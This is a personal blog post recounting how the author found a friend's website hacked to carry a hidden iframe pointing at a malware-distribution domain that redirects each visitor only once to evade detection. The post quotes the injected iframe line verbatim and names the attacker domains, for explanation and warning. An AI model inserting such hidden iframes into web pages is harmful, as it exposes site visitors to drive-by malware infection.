dtm: (Default)
[personal profile] dtm
Yeah, yeah. First post in a long time, first post of the new year, first post with a new US President, etc. Assume I've groveled sufficiently for not posting in ages.

So the other day I visited a website belonging to a friend and my web-browser completely freaked out, blocking the site and saying that it linked to all sorts of disreputable places. That is to say, it warned that my friend's site was including material from sites that attempted to install all sorts of malware.

Now, this was odd, but occasionally a bad ad can get into an ad network, and then everyone showing those ads accidentally is displaying malware, and I figured that was what happened since when I went back and then visited the site again, all was fine.

Only, after reloading her page I discovered that my friend doesn't run ads on her site.

Instead what I discovered after looking at the source was that someone had hacked her site and inserted
<iframe src=http://gstats.cn style=display:none></iframe>
into the source. That is, inserted an invisible (display:none) frame that included the contents of http://gstats.cn.

A little bit of poking revealed that gstats.cn is a very interesting site: the first time a given IP address visits that site, they're redirected to a site that attempts to install malware. On second and subsequent visits, that site pretends that nothing's there (and incidentally, probably violates Google's trademark while doing so).

Why would anyone do this?

Imagine for a moment that you're the kind of person who breaks into other's websites to spread malware. You're probably doing this because someone is paying you to send spam through infected machines under your command, or to steal personal information off the end users' machines. As long as the website you defaced to insert a reference to your domain keeps that reference in there, you get to infect more and more people. So one of your goals is to prevent the owners of the website from realizing that something's wrong, and fixing it.

For people like that, it must be a real pain that not every web visitor is infectable. Many people will have anti-virus software or paranoid web-browsers that'll pop up errors if you try to infect them. Having errors pop up is bad if you want to go undetected.

So what you do is compromise: you'll attempt once to infect each visitor. After that, you'll show something harmless. The idea is that people running vulnerable systems will be infected the first time - so there's no point in infecting them again - and people running systems that will pop up errors when you try to infect them will pop the errors up once, but then never again.

After all, everyone is trained in the idea that the web has minor, one-time glitches all the time. So some error popped up when you visited a site once. Who's going to look too deeply if the error never re-occurs?

Very sneaky. It appears that gstats.cn is just the most recent such one-time redirect site for this batch of criminals; hostads.cn was an earlier site of theirs that appears to have operated along the same principles.
Anonymous( )Anonymous This account has disabled anonymous posting.
OpenID( )OpenID You can comment on this post while signed in with an account from many other sites, once you have confirmed your email address. Sign in using OpenID.
Account name:
If you don't have an account you can create one now.
HTML doesn't work in the subject.


Notice: This account is set to log the IP addresses of everyone who comments.
Links will be displayed as unclickable URLs to help prevent spam.

May 2017

212223242526 27

Most Popular Tags

Style Credit

Expand Cut Tags

No cut tags
Page generated Sep. 21st, 2017 05:12 am
Powered by Dreamwidth Studios